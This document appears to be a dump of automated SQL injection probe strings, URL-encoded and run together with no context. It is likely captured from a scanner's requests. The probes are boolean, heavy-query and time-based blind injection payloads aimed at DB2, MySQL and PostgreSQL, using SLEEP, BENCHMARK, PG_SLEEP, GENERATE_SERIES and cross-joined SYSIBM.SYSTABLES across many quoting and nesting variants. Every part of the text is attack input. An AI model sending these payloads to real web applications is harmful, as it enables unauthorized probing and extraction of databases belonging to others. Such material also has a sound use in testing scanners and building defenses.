1%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27EhXO%27%3D%27EhXO 1%27%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27cKJs%27%3D%27cKJs 1%27%29%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27mmrG%27%3D%27mmrG 1%27%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27mXTG%27%3D%27mXTG 1%27%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27oKvZ%27%20LIKE%20%27oKvZ 1%27%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27FEWl%27%20LIKE%20%27FEWl 1%27%29%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27RkrD%27%20LIKE%20%27RkrD 1%27%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27PBwI%27%20LIKE%20%27PBwI 1%22%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22ryfY%22%3D%22ryfY 1%22%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22CNLV%22%3D%22CNLV 1%22%29%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22aXss%22%3D%22aXss 1%22%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22FEJL%22%3D%22FEJL 1%22%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22vsTP%22%20LIKE%20%22vsTP 1%22%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22DJBI%22%20LIKE%20%22DJBI 1%22%29%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22FcVe%22%20LIKE%20%22FcVe 1%22%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22tBnV%22%20LIKE%20%22tBnV 1%29%20WHERE%206766%3D6766%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%29%20WHERE%201960%3D1960%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%20WHERE%201797%3D1797%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%22%20WHERE%203873%3D3873%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%20%7C%7C%20%28SELECT%206218%20FROM%20DUAL%20WHERE%206774%3D6774%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205809%20WHERE%209392%3D9392%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201785%20FROM%20DUAL%20WHERE%206077%3D6077%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 1%20%2B%20%28SELECT%203220%20WHERE%207388%3D7388%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 1%27%20%2B%20%28SELECT%20%27xIyA%27%20FROM%20DUAL%20WHERE%203182%3D3182%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27abpY%27%20WHERE%202602%3D2602%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 1%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%288765%3D8765 1%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%281293%3D1293 1%29%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%283474%3D3474 1%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27CJDy%27%3D%27CJDy 1%27%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27dtxi%27%3D%27dtxi 1%27%29%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27BEMR%27%3D%27BEMR 1%27%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27mGAv%27%3D%27mGAv 1%27%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27rbNm%27%20LIKE%20%27rbNm 1%27%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27tOnO%27%20LIKE%20%27tOnO 1%27%29%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27jZdQ%27%20LIKE%20%27jZdQ 1%27%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27Glix%27%20LIKE%20%27Glix 1%22%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22CTYh%22%3D%22CTYh 1%22%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22uvhx%22%3D%22uvhx 1%22%29%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22myHa%22%3D%22myHa 1%22%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22yJOW%22%3D%22yJOW 1%22%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22cBFW%22%20LIKE%20%22cBFW 1%22%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22NYrT%22%20LIKE%20%22NYrT 1%22%29%29%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22flCy%22%20LIKE%20%22flCy 1%22%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22KQPD%22%20LIKE%20%22KQPD 1%29%20WHERE%206122%3D6122%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20WHERE%203034%3D3034%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20WHERE%208344%3D8344%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20WHERE%205298%3D5298%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20%7C%7C%20%28SELECT%204187%20FROM%20DUAL%20WHERE%204543%3D4543%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204101%20WHERE%208518%3D8518%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209276%20FROM%20DUAL%20WHERE%207741%3D7741%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 1%20%2B%20%28SELECT%202958%20WHERE%209030%3D9030%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 1%27%20%2B%20%28SELECT%20%27erAg%27%20FROM%20DUAL%20WHERE%206358%3D6358%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27TuUl%27%20WHERE%207313%3D7313%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204004%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%23 -8982%29%20OR%207578%3DSLEEP%285%29 -5615%27%29%20OR%207578%3DSLEEP%285%29 -7128%27%20OR%207578%3DSLEEP%285%29 -2623%22%20OR%207578%3DSLEEP%285%29 -9545%29%20OR%207578%3DSLEEP%285%29%20AND%20%284887%3D4887 -2193%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%289453%3D9453 -2278%29%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%288258%3D8258 -2079%20OR%207578%3DSLEEP%285%29 -2216%27%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%27YcJI%27%3D%27YcJI -5571%27%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%27NpAk%27%3D%27NpAk -9259%27%29%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%28%27DMHS%27%3D%27DMHS -2967%27%20OR%207578%3DSLEEP%285%29%20AND%20%27Rqdo%27%3D%27Rqdo -5465%27%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%27QZns%27%20LIKE%20%27QZns -6267%27%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%27oRRU%27%20LIKE%20%27oRRU -8670%27%29%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%28%27vqWg%27%20LIKE%20%27vqWg -4048%27%20OR%207578%3DSLEEP%285%29%20AND%20%27ktiq%27%20LIKE%20%27ktiq -5985%22%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%22CYbI%22%3D%22CYbI -9527%22%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%22griY%22%3D%22griY -9504%22%29%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%28%22QaMt%22%3D%22QaMt -9856%22%20OR%207578%3DSLEEP%285%29%20AND%20%22HZeT%22%3D%22HZeT -3714%22%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%22MkvM%22%20LIKE%20%22MkvM -4717%22%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%22apWp%22%20LIKE%20%22apWp -4852%22%29%29%29%20OR%207578%3DSLEEP%285%29%20AND%20%28%28%28%22pkCE%22%20LIKE%20%22pkCE -8496%22%20OR%207578%3DSLEEP%285%29%20AND%20%22Citl%22%20LIKE%20%22Citl -6197%29%20WHERE%205796%3D5796%20OR%207578%3DSLEEP%285%29 -2809%27%29%20WHERE%206340%3D6340%20OR%207578%3DSLEEP%285%29 -6929%27%20WHERE%207621%3D7621%20OR%207578%3DSLEEP%285%29 -9020%22%20WHERE%207953%3D7953%20OR%207578%3DSLEEP%285%29 -6519%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -6743%27%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -2205%27%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -7107%22%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -9921%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%289986%3D9986 -5843%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%281794%3D1794 -6775%29%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%286814%3D6814 -7943%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -8864%27%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%27lKNZ%27%3D%27lKNZ -2065%27%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%27aBWG%27%3D%27aBWG -9614%27%29%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%28%27qbYo%27%3D%27qbYo -4845%27%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%27eIHv%27%3D%27eIHv -3216%27%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%27hzcp%27%20LIKE%20%27hzcp -5660%27%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%27UowD%27%20LIKE%20%27UowD -8636%27%29%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%28%27QCPR%27%20LIKE%20%27QCPR -9235%27%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%27eDug%27%20LIKE%20%27eDug -9389%22%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%22ySNT%22%3D%22ySNT -6095%22%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%22LnHK%22%3D%22LnHK -4756%22%29%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%28%22hVFc%22%3D%22hVFc -1775%22%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%22aPeA%22%3D%22aPeA -8387%22%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%22YMGw%22%20LIKE%20%22YMGw -4287%22%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%22Biap%22%20LIKE%20%22Biap -3477%22%29%29%29%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%28%28%28%22sqwm%22%20LIKE%20%22sqwm -7245%22%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29%20AND%20%22OOkk%22%20LIKE%20%22OOkk -6422%29%20WHERE%209232%3D9232%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -7040%27%29%20WHERE%202520%3D2520%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -4136%27%20WHERE%205095%3D5095%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -1048%22%20WHERE%203531%3D3531%20OR%206374%3DBENCHMARK%285000000%2CMD5%280x45554c54%29%29 -7237%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -6844%27%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -1501%27%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -4542%22%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -8070%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%285195%3D5195 -2761%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%282780%3D2780 -3274%29%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%287829%3D7829 -8208%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -5349%27%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27FUuC%27%3D%27FUuC -5283%27%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27YVCB%27%3D%27YVCB -1103%27%29%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27szIf%27%3D%27szIf -5780%27%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%27EWJm%27%3D%27EWJm -1363%27%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27oMGU%27%20LIKE%20%27oMGU -1348%27%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27IYjD%27%20LIKE%20%27IYjD -5386%27%29%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27glfT%27%20LIKE%20%27glfT -5366%27%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%27xRHy%27%20LIKE%20%27xRHy -2345%22%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22SGCd%22%3D%22SGCd -1279%22%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22drbQ%22%3D%22drbQ -8144%22%29%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22SZvB%22%3D%22SZvB -8006%22%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%22Tlen%22%3D%22Tlen -3378%22%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22jzpZ%22%20LIKE%20%22jzpZ -8889%22%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22masx%22%20LIKE%20%22masx -2585%22%29%29%29%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22fyYJ%22%20LIKE%20%22fyYJ -4006%22%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29%20AND%20%22VpbU%22%20LIKE%20%22VpbU -3172%29%20WHERE%207171%3D7171%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -9403%27%29%20WHERE%204236%3D4236%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -2869%27%20WHERE%203301%3D3301%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -7421%22%20WHERE%202774%3D2774%20OR%206400%3D%28SELECT%206400%20FROM%20PG_SLEEP%285%29%29 -9897%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -4371%27%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8027%27%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -1203%22%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -1590%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%285396%3D5396 -1728%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%287061%3D7061 -9799%29%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%286629%3D6629 -6797%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -3855%27%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27npPu%27%3D%27npPu -5682%27%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27nUIz%27%3D%27nUIz -7937%27%29%29%29%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27fGij%27%3D%27fGij -6515%27%20OR%201711%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27CwCu%27%3D%27CwCu 